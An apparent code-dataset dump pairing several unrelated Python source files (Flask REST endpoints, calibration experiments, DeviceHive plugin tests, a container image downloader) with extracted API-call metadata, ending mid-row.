code
stringlengths 22
1.05M
| apis
listlengths 1
3.31k
| extract_api
stringlengths 75
3.25M
|
---|---|---|
#!/usr/bin/env python
# Example taken from:
# http://www.mathworks.com/access/helpdesk/help/techdoc/visualize/f5-3371.html
from scitools.easyviz import *
from time import sleep
from scipy import io
setp(interactive=False)
# Displaying an Isosurface:
mri = io.loadmat('mri_matlab_v6.mat')
D = mri['D']
#Ds = smooth3(D);
isosurface(D,5,indexing='xy')
#hiso = isosurface(Ds,5),
# 'FaceColor',[1,.75,.65],...
# 'EdgeColor','none');
shading('interp')
# Adding an Isocap to Show a Cutaway Surface:
#hcap = patch(isocaps(D,5),...
# 'FaceColor','interp',...
# 'EdgeColor','none');
#colormap(map)
# Define the View:
view(45,30)
axis('tight')
daspect([1,1,.4])
# Add Lighting:
#lightangle(45,30);
#set(gcf,'Renderer','zbuffer'); lighting phong
#isonormals(Ds,hiso)
#set(hcap,'AmbientStrength',.6)
#set(hiso,'SpecularColorReflectance',0,'SpecularExponent',50)
show()
raw_input('Press Return key to quit: ')
#savefig('tmp_isosurf2a.eps')
#savefig('tmp_isosurf2a.png')
| [
"scipy.io.loadmat"
]
| [((260, 291), 'scipy.io.loadmat', 'io.loadmat', (['"""mri_matlab_v6.mat"""'], {}), "('mri_matlab_v6.mat')\n", (270, 291), False, 'from scipy import io\n')] |
"""Blueprint definitions for maDMP integration."""
from flask import Blueprint, jsonify, request
from invenio_db import db
from .convert import convert_dmp
from .models import DataManagementPlan
def _summarize_dmp(dmp: DataManagementPlan) -> dict:
"""Create a summary dictionary for the given DMP."""
res = {"dmp_id": dmp.dmp_id, "datasets": []}
for ds in dmp.datasets:
dataset = {"dataset_id": ds.dataset_id, "record": None}
if ds.record:
dataset["record"] = ds.record.model.json
res["datasets"].append(dataset)
return res
def create_rest_blueprint(app) -> Blueprint:
"""Create the blueprint for the REST endpoints using the current app extensions."""
# note: using flask.current_app isn't directly possible, because Invenio-MaDMP is
# registered as an extension in the API app, not the "normal" app
# (which is the one usually returned by current_app)
rest_blueprint = Blueprint("invenio_madmp", __name__)
auth = app.extensions["invenio-madmp"].auth
@rest_blueprint.route("/dmps", methods=["GET"])
@auth.login_required
def list_dmps():
"""Give a summary of all stored DMPs."""
dmps = DataManagementPlan.query.all()
res = [_summarize_dmp(dmp) for dmp in dmps]
return jsonify(res)
@rest_blueprint.route("/dmps", methods=["POST"])
@auth.login_required
def create_dmp():
"""Create a new DMP from the maDMP JSON in the request body."""
if request.json is None:
return jsonify({"error": "no json body supplied"}), 400
elif request.json.get("dmp") is None:
return jsonify({"error": "dmp not found in the body"}), 400
dmp_json = request.json.get("dmp", {})
dmp_json_id = dmp_json.get("dmp_id", {}).get("identifier")
if DataManagementPlan.get_by_dmp_id(dmp_json_id) is not None:
return jsonify({"error": "dmp with the same id already exists"}), 409
dmp = convert_dmp(dmp_json)
db.session.add(dmp)
db.session.commit()
# TODO change the returned value
return jsonify(_summarize_dmp(dmp)), 201
@rest_blueprint.route("/dmps/<dmp_id>", methods=["PATCH"])
@auth.login_required
def update_dmp(dmp_id: str = None):
"""Update the specified DMP using the maDMP JSON in the request body."""
hard_sync = request.args.get("sync", "soft") == "hard"
if request.json is None:
return jsonify({"error": "no json body supplied"}), 400
elif request.json.get("dmp") is None:
return jsonify({"error": "dmp not found in the body"}), 400
dmp_json = request.json.get("dmp", {})
dmp_json_id = dmp_json.get("dmp_id", {}).get("identifier")
if dmp_id and dmp_json_id and dmp_id != dmp_json_id:
return jsonify({"error": "mismatch between dmp id from url and body"}), 400
dmp_id = dmp_id or dmp_json_id
if DataManagementPlan.get_by_dmp_id(dmp_id) is None:
return jsonify({"error": "dmp not found"}), 404
dmp = convert_dmp(dmp_json, hard_sync)
db.session.commit()
# TODO change the returned value
return jsonify(_summarize_dmp(dmp))
@rest_blueprint.route("/dmps", methods=["PATCH"])
@auth.login_required
def update_dmp_without_id():
"""Update the specified DMP using the maDMP JSON in the request body."""
return update_dmp(None)
return rest_blueprint
| [
"flask.request.args.get",
"invenio_db.db.session.commit",
"invenio_db.db.session.add",
"flask.request.json.get",
"flask.Blueprint",
"flask.jsonify"
]
| [((965, 1001), 'flask.Blueprint', 'Blueprint', (['"""invenio_madmp"""', '__name__'], {}), "('invenio_madmp', __name__)\n", (974, 1001), False, 'from flask import Blueprint, jsonify, request\n'), ((1312, 1324), 'flask.jsonify', 'jsonify', (['res'], {}), '(res)\n', (1319, 1324), False, 'from flask import Blueprint, jsonify, request\n'), ((1737, 1764), 'flask.request.json.get', 'request.json.get', (['"""dmp"""', '{}'], {}), "('dmp', {})\n", (1753, 1764), False, 'from flask import Blueprint, jsonify, request\n'), ((2030, 2049), 'invenio_db.db.session.add', 'db.session.add', (['dmp'], {}), '(dmp)\n', (2044, 2049), False, 'from invenio_db import db\n'), ((2058, 2077), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2075, 2077), False, 'from invenio_db import db\n'), ((2682, 2709), 'flask.request.json.get', 'request.json.get', (['"""dmp"""', '{}'], {}), "('dmp', {})\n", (2698, 2709), False, 'from flask import Blueprint, jsonify, request\n'), ((3144, 3163), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3161, 3163), False, 'from invenio_db import db\n'), ((2399, 2431), 'flask.request.args.get', 'request.args.get', (['"""sync"""', '"""soft"""'], {}), "('sync', 'soft')\n", (2415, 2431), False, 'from flask import Blueprint, jsonify, request\n'), ((1550, 1593), 'flask.jsonify', 'jsonify', (["{'error': 'no json body supplied'}"], {}), "({'error': 'no json body supplied'})\n", (1557, 1593), False, 'from flask import Blueprint, jsonify, request\n'), ((1612, 1635), 'flask.request.json.get', 'request.json.get', (['"""dmp"""'], {}), "('dmp')\n", (1628, 1635), False, 'from flask import Blueprint, jsonify, request\n'), ((1922, 1979), 'flask.jsonify', 'jsonify', (["{'error': 'dmp with the same id already exists'}"], {}), "({'error': 'dmp with the same id already exists'})\n", (1929, 1979), False, 'from flask import Blueprint, jsonify, request\n'), ((2495, 2538), 'flask.jsonify', 'jsonify', (["{'error': 'no json body supplied'}"], {}), "({'error': 'no json body supplied'})\n", (2502, 2538), False, 'from flask import Blueprint, jsonify, request\n'), ((2557, 2580), 'flask.request.json.get', 'request.json.get', (['"""dmp"""'], {}), "('dmp')\n", (2573, 2580), False, 'from flask import Blueprint, jsonify, request\n'), ((2858, 2921), 'flask.jsonify', 'jsonify', (["{'error': 'mismatch between dmp id from url and body'}"], {}), "({'error': 'mismatch between dmp id from url and body'})\n", (2865, 2921), False, 'from flask import Blueprint, jsonify, request\n'), ((3047, 3082), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found'}"], {}), "({'error': 'dmp not found'})\n", (3054, 3082), False, 'from flask import Blueprint, jsonify, request\n'), ((1664, 1711), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found in the body'}"], {}), "({'error': 'dmp not found in the body'})\n", (1671, 1711), False, 'from flask import Blueprint, jsonify, request\n'), ((2609, 2656), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found in the body'}"], {}), "({'error': 'dmp not found in the body'})\n", (2616, 2656), False, 'from flask import Blueprint, jsonify, request\n')] |
import sys
sys.path = ['', '..'] + sys.path[1:]
import daemon
from assistance_bot import core
from functionality.voice_processing import speaking, listening
from functionality.commands import *
if __name__ == '__main__':
speaking.setup_assistant_voice(core.ttsEngine, core.assistant)
while True:
# start speech recording and speech recognition
recognized_speech = listening.get_listening_and_recognition_result(
core.recognizer,
core.microphone)
# executing the given command
execute_command(recognized_speech)
| [
"functionality.voice_processing.listening.get_listening_and_recognition_result",
"functionality.voice_processing.speaking.setup_assistant_voice"
]
| [((229, 291), 'functionality.voice_processing.speaking.setup_assistant_voice', 'speaking.setup_assistant_voice', (['core.ttsEngine', 'core.assistant'], {}), '(core.ttsEngine, core.assistant)\n', (259, 291), False, 'from functionality.voice_processing import speaking, listening\n'), ((392, 477), 'functionality.voice_processing.listening.get_listening_and_recognition_result', 'listening.get_listening_and_recognition_result', (['core.recognizer', 'core.microphone'], {}), '(core.recognizer, core.microphone\n )\n', (438, 477), False, 'from functionality.voice_processing import speaking, listening\n')] |
import argparse
import multiprocessing
import os
import random
import numpy as np
from data_utils import DATAFILE_LIST, DATASET_LIST, prepare_data, RESULTS_DIR
from models import SumOfBetaEce
random.seed(2020)
num_cores = multiprocessing.cpu_count()
NUM_BINS = 10
NUM_RUNS = 100
N_list = [100, 200, 500, 1000, 2000, 5000, 10000]
OUTPUT_DIR = RESULTS_DIR + "bayesian_reliability_comparison/"
def main(args) -> None:
# load data
categories, observations, confidences, idx2category, category2idx, labels = prepare_data(
DATAFILE_LIST[args.dataset], False)
# train a ground_truth ece model
if args.ground_truth_type == 'bayesian':
ground_truth_model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=args.pseudocount)
else:
ground_truth_model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=1e-3)
ground_truth_model.update_batch(confidences, observations)
results = np.zeros((args.num_runs, len(N_list), 5))
for run_id in range(args.num_runs):
tmp = list(zip(confidences, observations))
random.shuffle(tmp)
confidences, observations = zip(*tmp)
model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=args.pseudocount)
for i in range(len(N_list)):
tmp = 0 if i == 0 else N_list[i - 1]
model.update_batch(confidences[tmp: N_list[i]], observations[tmp: N_list[i]])
results[run_id, i, 0] = N_list[i]
results[run_id, i, 1] = model.eval
results[run_id, i, 2] = model.frequentist_eval
results[run_id, i, 3] = model.calibration_estimation_error(ground_truth_model, args.weight_type)
results[run_id, i, 4] = model.frequentist_calibration_estimation_error(ground_truth_model, args.weight_type)
results_mean = np.mean(results, axis=0)
results_variance = np.std(results, axis=0)
if args.weight_type == 'online':
OUTPUT_DIR += "online_weights/"
try:
os.stat(OUTPUT_DIR)
except:
os.mkdir(OUTPUT_DIR)
if args.ground_truth_type == 'frequentist':
filename_mean = OUTPUT_DIR + "frequentist_ground_truth_%s_pseudocount%d.csv" % (args.dataset, args.pseudocount)
filename_std = OUTPUT_DIR + "frequentist_ground_truth_%s_pseudocount%d_std.csv" % (
args.dataset, args.pseudocount)
else:
filename_mean = OUTPUT_DIR + "bayesian_ground_truth_%s_pseudocount%d.csv" % (args.dataset, args.pseudocount)
filename_std = OUTPUT_DIR + "bayesian_ground_truth_%s_pseudocount%d_std.csv" % (
args.dataset, args.pseudocount)
header = 'N, bayesian_ece, frequentist_ece, bayesian_estimation_error, frequentist_estimation_error'
np.savetxt(filename_mean, results_mean, delimiter=',', header=header)
np.savetxt(filename_std, results_variance, delimiter=',', header=header)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str, default='cifar100', help='input dataset')
parser.add_argument('-pseudocount', type=int, default=1, help='strength of prior')
parser.add_argument('-ground_truth_type', type=str, default='bayesian',
help='compute ground truth in a Bayesian or frequentist way, bayesian or frequentist')
parser.add_argument('-weight_type', type=str, default='pool',
help='weigh each bin with all data or only data seen so far, online or pool')
parser.add_argument('--num_runs', type=int, default=NUM_RUNS, help='number of runs')
parser.add_argument('--num_bins', type=int, default=NUM_BINS, help='number of bins in reliability diagram')
args, _ = parser.parse_known_args()
if args.dataset not in DATASET_LIST:
raise ValueError("%s is not in DATASET_LIST." % args.dataset)
main(args)
| [
"data_utils.prepare_data",
"numpy.mean",
"random.shuffle",
"argparse.ArgumentParser",
"multiprocessing.cpu_count",
"random.seed",
"os.mkdir",
"numpy.savetxt",
"numpy.std",
"os.stat",
"models.SumOfBetaEce"
]
| [((195, 212), 'random.seed', 'random.seed', (['(2020)'], {}), '(2020)\n', (206, 212), False, 'import random\n'), ((225, 252), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (250, 252), False, 'import multiprocessing\n'), ((517, 565), 'data_utils.prepare_data', 'prepare_data', (['DATAFILE_LIST[args.dataset]', '(False)'], {}), '(DATAFILE_LIST[args.dataset], False)\n', (529, 565), False, 'from data_utils import DATAFILE_LIST, DATASET_LIST, prepare_data, RESULTS_DIR\n'), ((1798, 1822), 'numpy.mean', 'np.mean', (['results'], {'axis': '(0)'}), '(results, axis=0)\n', (1805, 1822), True, 'import numpy as np\n'), ((1846, 1869), 'numpy.std', 'np.std', (['results'], {'axis': '(0)'}), '(results, axis=0)\n', (1852, 1869), True, 'import numpy as np\n'), ((2701, 2770), 'numpy.savetxt', 'np.savetxt', (['filename_mean', 'results_mean'], {'delimiter': '""","""', 'header': 'header'}), "(filename_mean, results_mean, delimiter=',', header=header)\n", (2711, 2770), True, 'import numpy as np\n'), ((2775, 2847), 'numpy.savetxt', 'np.savetxt', (['filename_std', 'results_variance'], {'delimiter': '""","""', 'header': 'header'}), "(filename_std, results_variance, delimiter=',', header=header)\n", (2785, 2847), True, 'import numpy as np\n'), ((2891, 2916), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2914, 2916), False, 'import argparse\n'), ((686, 752), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': 'args.pseudocount'}), '(num_bins=args.num_bins, pseudocount=args.pseudocount)\n', (698, 752), False, 'from models import SumOfBetaEce\n'), ((792, 847), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': '(0.001)'}), '(num_bins=args.num_bins, pseudocount=0.001)\n', (804, 847), False, 'from models import SumOfBetaEce\n'), ((1068, 1087), 'random.shuffle', 'random.shuffle', (['tmp'], {}), '(tmp)\n', (1082, 1087), False, 'import random\n'), ((1151, 1217), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': 'args.pseudocount'}), '(num_bins=args.num_bins, pseudocount=args.pseudocount)\n', (1163, 1217), False, 'from models import SumOfBetaEce\n'), ((1965, 1984), 'os.stat', 'os.stat', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (1972, 1984), False, 'import os\n'), ((2005, 2025), 'os.mkdir', 'os.mkdir', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (2013, 2025), False, 'import os\n')] |
from sigvisa.learn.train_coda_models import get_shape_training_data
import numpy as np
X, y, evids = get_shape_training_data(runid=4, site="AS12", chan="SHZ", band="freq_2.0_3.0", phases=["P",], target="amp_transfer", max_acost=np.float("inf"), min_amp=-2)
np.savetxt("X.txt", X)
np.savetxt("y.txt", y)
np.savetxt("evids.txt", evids)
| [
"numpy.float",
"numpy.savetxt"
]
| [((258, 280), 'numpy.savetxt', 'np.savetxt', (['"""X.txt"""', 'X'], {}), "('X.txt', X)\n", (268, 280), True, 'import numpy as np\n'), ((281, 303), 'numpy.savetxt', 'np.savetxt', (['"""y.txt"""', 'y'], {}), "('y.txt', y)\n", (291, 303), True, 'import numpy as np\n'), ((304, 334), 'numpy.savetxt', 'np.savetxt', (['"""evids.txt"""', 'evids'], {}), "('evids.txt', evids)\n", (314, 334), True, 'import numpy as np\n'), ((229, 244), 'numpy.float', 'np.float', (['"""inf"""'], {}), "('inf')\n", (237, 244), True, 'import numpy as np\n')] |
from ad9833 import AD9833
# DUMMY classes for testing without board
class SBI(object):
def __init__(self):
pass
def send(self, data):
print(data)
class Pin(object):
def __init__(self):
pass
def low(self):
print(" 0")
def high(self):
print(" 1")
# Code
SBI1 = SBI()
PIN3 = Pin()
wave = AD9833(SBI1, PIN3)
wave.set_freq(14500)
wave.set_type(2)
wave.send()
print(wave.shape_type)
| [
"ad9833.AD9833"
]
| [((387, 405), 'ad9833.AD9833', 'AD9833', (['SBI1', 'PIN3'], {}), '(SBI1, PIN3)\n', (393, 405), False, 'from ad9833 import AD9833\n')] |
# Copyright (C) 2018 DataArt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from six.moves import range
def test_subscribe_events(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-e', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-e', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_name = '%s-command' % device_id
notification_name = '%s-notification' % device_id
return {'device': device,
'network': network,
'command_name': command_name,
'notification_name': notification_name}
def send_data(device, command_name, notification_name):
command = device.send_command(command_name)
command.status = 'status'
command.save()
notification = device.send_notification(notification_name)
return command.id, command.id, notification.id
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('command/update', command_update_id),
('notification/insert', notification_id)]
def handle_event(handler, event):
action_id_pair = (event.action, event.data.id)
assert action_id_pair in handler.data['event_ids']
handler.data['event_ids'].remove(action_id_pair)
if handler.data['event_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id])
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('command/update', command_update_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_notifications=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('notification/insert', notification_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_update_commands=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/update', command_update_id),
('notification/insert', notification_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_insert_commands(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-i-c', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-i-c', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'command_names': command_names}
def send_data(device, command_names):
return [device.send_command(name).id for name in command_names]
def handle_connect(handler):
handler.data['command_ids'] = send_data(handler.data['device'],
handler.data['command_names'])
def handle_command_insert(handler, command):
assert command.id in handler.data['command_ids']
handler.data['command_ids'].remove(command.id)
if handler.data['command_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-i-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_update_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_insert=handle_command_insert, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['command_ids'] = send_data(
handler.data['device'], handler.data['command_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-i-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['command_names'][-1:],
subscribe_update_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_insert=handle_command_insert, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_update_commands(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-u-c', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-u-c', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'command_names': command_names}
def send_data(device, command_names):
command_ids = []
for name in command_names:
command = device.send_command(name)
command.status = 'status'
command.save()
command_ids.append(command.id)
return command_ids
def handle_connect(handler):
handler.data['command_ids'] = send_data(handler.data['device'],
handler.data['command_names'])
def handle_command_update(handler, command):
assert command.id in handler.data['command_ids']
assert command.status == 'status'
handler.data['command_ids'].remove(command.id)
if handler.data['command_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-u-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_update=handle_command_update, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['command_ids'] = send_data(
handler.data['device'], handler.data['command_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-u-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['command_names'][-1:],
subscribe_insert_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_update=handle_command_update, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_notifications(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-n', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-n', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
notification_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'notification_names': notification_names}
def send_data(device, notification_names):
return [device.send_notification(name).id for name in
notification_names]
def handle_connect(handler):
handler.data['notification_ids'] = send_data(
handler.data['device'], handler.data['notification_names'])
def handle_notification(handler, notification):
assert notification.id in handler.data['notification_ids']
handler.data['notification_ids'].remove(notification.id)
if handler.data['notification_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-n', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False,
subscribe_update_commands=False)
test.run(plugin, handle_connect,
handle_notification=handle_notification, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['notification_ids'] = send_data(
handler.data['device'], handler.data['notification_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-n', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['notification_names'][-1:],
subscribe_insert_commands=False,
subscribe_update_commands=False)
test.run(plugin, handle_connect,
handle_notification=handle_notification, data=data)
plugin_api.remove_plugin(plugin['topicName'])
| [
"six.moves.range"
]
| [((6449, 6457), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (6454, 6457), False, 'from six.moves import range\n'), ((9168, 9176), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (9173, 9176), False, 'from six.moves import range\n'), ((12099, 12107), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (12104, 12107), False, 'from six.moves import range\n')] |
from __future__ import print_function
import os
import shutil
import hashlib
import requests
import click
from tempfile import NamedTemporaryFile
from hashlib import sha256
from os.path import expanduser, join, exists, basename
from .utils import HumanSize
from .tar import extract_layer
from . import trust
from . import container
from .colorhelper import print_info, print_error, print_warn, print_success
from .colorhelper import success
from .image_index import get_url
from clint.textui import progress
from dateutil.parser import parse as parsedate
from datetime import datetime
CACHE_PATH = join(expanduser("~"), ".pylibcontainer", "images_cache")
class Cache(object):
cache_dir = CACHE_PATH
""" Provides an image caching mechanism on disk """
def __init__(self):
if not exists(CACHE_PATH):
os.makedirs(CACHE_PATH, 0o700)
def get(self, cache_key, default=None):
""" return info for cached file """
cache_hash = sha256(cache_key.encode()).hexdigest()
cache_fn = join(CACHE_PATH, "url_" + cache_hash)
if exists(cache_fn):
file_stat = os.stat(cache_fn)
last_modified = datetime.fromtimestamp(file_stat.st_mtime)
file_size = file_stat.st_size
return cache_fn, cache_hash, last_modified, file_size
return default
def put(self, filename, cache_key):
""" put a file into cache """
cache_hash = sha256(cache_key.encode()).hexdigest()
cache_fn = join(CACHE_PATH, "url_" + cache_hash)
shutil.move(filename, cache_fn)
return cache_hash, cache_fn
def download(image_url):
""" Download image (if not found in cache) and return it's filename """
response = requests.head(image_url)
file_size = remote_file_size = int(response.headers.get("Content-Length"))
remote_last_modified = parsedate(response.headers.get("Last-Modified")).replace(
tzinfo=None
)
remote_is_valid = response.status_code == 200 and file_size and remote_last_modified
# Check if image is on cache
cache = Cache()
cached_image = cache.get(image_url)
if cached_image:
if remote_is_valid:
cache_fn, cache_hash, last_modified, file_size = cached_image
if remote_file_size == file_size and remote_last_modified < last_modified:
print_info("Using file from cache", CACHE_PATH)
return cache_hash, cache_fn
print_info("Downloading new remote file because an update was found")
else:
print_warn("Unable to check the status for " + image_url)
print_warn("Assuming local cache is valid")
# Not cached, and no valid remote information was found
if not remote_is_valid:
print_error(
"Unable to get file, http_code=%s, size=%s, last_modified=%s"
% (response.status_code, remote_file_size, remote_last_modified)
)
exit(2)
# Dowload image
print_info(
"Downloading image... ",
"{0} [{1:.2S}]".format(basename(image_url), HumanSize(file_size)),
)
remote_sha256 = hashlib.sha256()
response = requests.get(image_url, stream=True)
with NamedTemporaryFile(delete=False) as tmp_file:
for chunk in progress.bar(
response.iter_content(chunk_size=1024), expected_size=(file_size / 1024) + 1
):
if chunk:
remote_sha256.update(chunk)
tmp_file.write(chunk)
tmp_file.flush()
# Verify image integrity
trust_verify = trust.verify(image_url, tmp_file.name, remote_sha256.hexdigest())
if not trust_verify or not trust_verify.valid or not trust_verify.username:
print_error("Integrity/authenticity error - GPG signature mismatch!")
exit(3)
print("{0:>10}: {1}".format("GPG Signer", success(trust_verify.username)))
print("{0:>10}: {1}".format("GPG ID", success(trust_verify.pubkey_fingerprint)))
print("{0:>10}: {1}".format("Creation", success(trust_verify.creation_date)))
return cache.put(tmp_file.name, image_url)
@click.command()
@click.argument("image_url")
@click.option("--as_root", is_flag=True)
@click.option("--overlay", "-o", multiple=True)
@click.argument("command", nargs=-1)
def run(image_url, command, as_root, overlay):
url = get_url(image_url)
image_url = url or image_url
if not image_url:
print_info("No index was found for image", image_url)
exit(5)
is_validate_only = False
if not command:
command = ["/bin/sh"]
image_protocol = image_url.split(":")[0].lower()
if image_protocol in ["http", "https"]:
_, image_fn = download(image_url)
else:
_, image_fn = sha256(image_url).hexdigest(), image_url
rootfs = extract_layer(image_fn)
if len(command) == 1 and command[0] == "-":
is_validate_only = True
print("Validating container setup with the rootfs")
else:
print_info("Executing", " ".join(command))
_, exit_code = container.runc(rootfs, command, as_root, overlay)
if exit_code != 0:
print_error("Last command returned an error")
elif is_validate_only:
print_success("OK")
| [
"os.path.exists",
"click.argument",
"hashlib.sha256",
"datetime.datetime.fromtimestamp",
"os.makedirs",
"shutil.move",
"click.option",
"os.path.join",
"requests.get",
"requests.head",
"os.path.basename",
"tempfile.NamedTemporaryFile",
"os.stat",
"click.command",
"os.path.expanduser"
]
| [((4116, 4131), 'click.command', 'click.command', ([], {}), '()\n', (4129, 4131), False, 'import click\n'), ((4133, 4160), 'click.argument', 'click.argument', (['"""image_url"""'], {}), "('image_url')\n", (4147, 4160), False, 'import click\n'), ((4162, 4201), 'click.option', 'click.option', (['"""--as_root"""'], {'is_flag': '(True)'}), "('--as_root', is_flag=True)\n", (4174, 4201), False, 'import click\n'), ((4203, 4249), 'click.option', 'click.option', (['"""--overlay"""', '"""-o"""'], {'multiple': '(True)'}), "('--overlay', '-o', multiple=True)\n", (4215, 4249), False, 'import click\n'), ((4251, 4286), 'click.argument', 'click.argument', (['"""command"""'], {'nargs': '(-1)'}), "('command', nargs=-1)\n", (4265, 4286), False, 'import click\n'), ((604, 619), 'os.path.expanduser', 'expanduser', (['"""~"""'], {}), "('~')\n", (614, 619), False, 'from os.path import expanduser, join, exists, basename\n'), ((1738, 1762), 'requests.head', 'requests.head', (['image_url'], {}), '(image_url)\n', (1751, 1762), False, 'import requests\n'), ((3134, 3150), 'hashlib.sha256', 'hashlib.sha256', ([], {}), '()\n', (3148, 3150), False, 'import hashlib\n'), ((3166, 3202), 'requests.get', 'requests.get', 